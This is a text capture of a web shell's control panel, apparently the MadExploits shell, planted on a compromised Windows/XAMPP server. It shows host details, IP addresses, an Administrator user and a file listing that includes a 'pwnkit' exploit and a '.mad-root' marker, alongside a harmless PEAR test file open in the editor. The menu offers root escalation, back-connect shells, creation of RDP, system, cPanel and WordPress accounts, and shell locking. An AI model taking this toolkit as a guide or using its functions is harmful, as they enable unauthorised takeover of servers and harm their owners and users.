Windows NT IZOXMIX7871CBCZ 6.3 build 9600 (Windows Server 2012 R2 Datacenter Edition) AMD64
Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
: 172.23.17.241 | : 18.223.195.1
Cant Read [ /etc/named.conf ]
8.2.12
Administrator
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
[ C ]
C: /
xampp /
php /
tests /
parseFile /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-rw-rw-
File_Find-1.3.0__Find.php
15.29
KB
-rw-rw-rw-
PackageUpdate.php
37.05
KB
-rw-rw-rw-
conditional.php
970
B
-rw-rw-rw-
empty.php
1
B
-rw-rw-rw-
ignore_functions_match.php
391
B
-rw-rw-rw-
math.php
85
B
-rw-rw-rw-
php5_method_chaining.php
912
B
-rw-rw-rw-
php5_method_chaining_samp2.php
590
B
-rw-rw-rw-
phpweb-entities.php
2.36
KB
-rw-rw-rw-
pwnkit
10.99
KB
-rw-rw-rw-
zip.php
446
B
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : conditional.php
<?php // PHP 4.0.0 : __FILE__ // PHP 4.0.6 : DIRECTORY_SEPARATOR // PHP 4.0.7 : version compare // PHP 4.3.0 : ob_get_clean // PHP 4.3.0 : debug_backtrace // PHP 4.3.10 and 5.0.2 : PHP_EOL // PHP 5.0.0 : simplexml_load_file if (!defined('DIRECTORY_SEPARATOR')) { define('DIRECTORY_SEPARATOR', strtoupper(substr(PHP_OS, 0, 3) == 'WIN') ? '\\' : '/' ); } if (function_exists('debug_backtrace')) { $backtrace = debug_backtrace(); } else { $backtrace = false; } if (function_exists('simplexml_load_file')) { $xml = simplexml_load_file('C:\php\pear\PHP_CompatInfo\scripts\version.xml'); } if (version_compare(phpversion(), '5.0.0', '<')) { include_once 'PHP/Compat.php'; PHP_Compat::loadFunction('ob_get_clean'); PHP_Compat::loadConstant('PHP_EOL'); } echo "Hello World" . PHP_EOL; $ds = DIRECTORY_SEPARATOR; $fn = dirname(__FILE__) . $ds . basename(__FILE__); echo "You have run file : $fn at " . date(DATE_W3C) . PHP_EOL; ?>
Close